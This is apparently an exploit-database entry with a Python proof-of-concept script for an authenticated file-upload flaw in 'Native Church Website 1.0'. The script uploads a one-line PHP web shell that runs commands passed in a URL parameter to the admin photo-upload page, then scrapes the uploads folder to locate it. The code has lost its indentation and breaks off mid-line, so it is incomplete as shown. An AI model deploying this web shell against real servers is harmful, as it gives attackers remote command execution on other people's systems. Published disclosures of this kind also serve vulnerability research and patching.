Authored by Richard Jones

Native Church Website version 1.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Native Church Website - Arbitrary File Upload (Authenticated)
# Date: 04/21
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/11764/native-church-website-phpmysql.html
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4

#/usr/bin/python3

import requests
import re
from requests.models import ReadTimeoutError
import sys

s = requests.Session()

TARGET = "192.168.1.207" # <<< CHANGE ME

UPLOADS_URL = f"http://{TARGET}/native/admin/save-photo.php"
GALLERY_URL = f"http://{TARGET}/native/uploads/"

def get(url):
r = s.get(url)
return r.text

def banner():
ban = """ _______ __ __
____/ / ______ ______
/ | _/ ___ // / ____ / ___/
/ | ___ / | |_> >___
____|__ /___ >__/ / / | __/____ >
/ / / / |__| /

"""
return ban

def uploadShell():
data = (
('file', ("file.php", "<?php system($_GET['c']);?>")),
('caption', (None, 'simprevshell')),
)
r = s.post(UPLOADS_URL, files=data)
if r.status_code == 200:
return True
else:
return False

def getLink(page):
matchObj = re.findall("href="(.*?).php"", page)
return matchObj

def testURL(url):
r = s.get(url)
return r.status_code

def getUploadLink(uploads):
if len(NEW_UPLOADS) > 1:
for l in NEW_UPLOADS:
link = f"{GALLERY_URL}{l}.php"
if testURL(link) == 200:
return link

uploadShell()

# Get upload link.
NEW_UPLOADS=getLink(get(GALLERY_URL))
shellUrl = getUploadLink(NEW_UPLOADS)

print("